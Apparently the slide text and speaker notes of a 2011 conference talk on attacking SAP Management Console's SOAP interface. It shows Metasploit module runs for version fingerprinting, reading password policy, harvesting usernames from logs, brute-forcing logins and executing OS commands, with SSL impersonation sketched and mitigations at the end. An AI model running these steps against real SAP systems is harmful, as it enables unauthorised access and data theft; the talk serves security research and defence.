Hashdays Conference (29th Oct. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
9. “…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”
10. Other people describe them as…
“…the world's leading repository of
business critical information, SAP (which
stands for ”Security Ain't [our] Problem")
delivers products and services that
helpattackers gain access to critical
enterprise data.”
15. So Many Reasons
Vulnerabilties are a part of it!
Every system has it‘s vulnerabilities
SAP installations often fall to business
Not an operations problem
Financial data should be handled by the business
Security team never gets close to it!
16. “YOU CAN'T TEST THAT, IT'S
BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER
21. SAP MC Communications
Default port 5<instance>13/14
50013 HTTP
50014 HTTPS
Can use SSL
If it‘s configured
More on this later!
22. SAP MC Communications
Uses Basic authfor some functions
Yes... It‘s 2011
Yes... Companies still use Basic Auth
Most functions don‘t even use that!
30. Information is king
Version information
Sure, HTTP headers give that!
Nothing new here... mostly
Down to the patch-level
Can you say “targeted attack“
31.
32. Version Information
msfauxiliary(sap_mgmt_con_version) > show options
Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host
33. Version Information
msfauxiliary(sap_mgmt_con_version) > show options
Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host
34. Version Information
msfauxiliary(sap_mgmt_con_version) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
35. Version Information
msfauxiliary(sap_mgmt_con_version) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
36. Information is king
Startup profile
Instance name
SAP System Name
SAP SID
SAP DB Schema
Paths
....
39. Information is king
Server / Instance Environment
Computername
Database Names
Database Type (Oracle, MaxDB, ...)
Full Server Environment Variable list!
Information overload
OMG why!
42. Information is king
SAP Log/Tracefiles
SAP Startup Logs
Error / Debug Logs
Developer Traces
Security Logs
SAP ABAPSysLog
SAP Startup Times
PIDs
Services + Status Info
44. Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:usrsapNSPDVEBMGS00workdev_w0<name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate:allocated tm_adm at 09A47E48</item>
…
45. ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)
</Text><Severity>SAPControl-GREEN</Severity>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4;
Unicode Version 4.1
</Text><Severity>SAPControl-GREEN</Severity></item>
…
46. Information is king
Extracting data from logfiles
Logfiles include usernames
Scrape for usernames
Instant brute-force user list!
#wimming!
Just an example of the data availble
49. Information is king
Process Parameters
Output of the entire SAP configuration
Password Policies
Setup your Brute-force just right ;)
Hash Types
Still supporting those old 8 char hashes?
Security Audit Log Enabled ?
rsau/enabled (default: 0)
Is anybody watching?
50. Process Parameters
msfauxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0
51. Process Parameters
msfauxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0
54. Information is king
Useful Process Parameters
rsau/enabled
login/password_downward_compatibility
login/failed_user_auto_unlock
login/fails_to_user_lock
login/min_password_lng
login/password_charset
....
*Checkout consolut.com for a great list
55. “I put a whitebox configuration audit
in your blackbox penetration test, so
you can whitebox SAP while you
blackbox it!“
Quote by:
Me, just now!
75. Getting in the middle
4 different options for SSL protection
Self Signed
Device Default (not an option for SAP)
Enterprise CA
You sign your own certs centrally
Externally signed
Diginotar to the rescue!
SAP also offer signing services
76. Getting in the middle
Impersonate SSL
There‘s a module for that ;)
Creates a fake cert
As close to the original as possible
Useful SE options
Expired yesterday
Add CN names for ease of use
84. Brute Force
msfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msfauxiliary(sap_mgmt_con_brute_login) > run
[*]SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP’
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…
85. OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Command run as PID: 1240
Command output
--------------
WINXPSAP-TST
95. Fixing the issues
SAP Fix
SAP Note 1439348
Issue also discovered by Onapsis
No idea what it says!
SAP restrict ALL fix info to customers only
96. Next Steps
More Research
Finish the MITM module
Force Auth works now
JAVA Applet deployment not so much
Look at SAP SSL implementation
SSL is a punching bag right now
Sleep
98. Big Thanks
The REAL SAP Security Researchers
Onapsis
DSecRG
Raul Siles
CYBSEC
SAP PSRT
DirtySec (You know who you are!)
MacLemon for the PPT-fu
All the people who helped make this happen
Yeah… I said that!SAP is a perfect goal for attackers. All the companies crown jewels in once place!
In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws show 15-50 bugs per 1000 lines of delivered code… not all are security related, but that’s still a lot of bugs!
It’s not ALL SAPs fault… complex configurations user error maintaining backwards compatibilitytake your pick. In offering so much SAP are their own worst enemy.
If security never see it, how can they secure itMore importantly, if they don‘t understand it, how can they ever hope to secure it!
Think aboutTHAT logic for a second!I‘m pretty sure every security professional has heard that at one point or another
So what’s this SOAP thing then
Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
Yes it’s a sad sad world!SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication
Lots of cool dataLots of cool functionsLots of fun to be had!
There’s pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
Effect of password policies on keyspace reduction openwallDifferent password compliance rules can reduce the overall keyspace considerably!
So I scanned a small country!
What do we have already- Full server environment Version info SAP SIDDatabase info valid SAP usernames trace and debug logs
Wait... SSL will save us!
Yep.. It’s a feature remember? But we’ve already covered how we could get that
OSExecute is all well and good...Run a single commandGet the response..
Block itFilter itRestrict it to administratorsYES this means internally as well!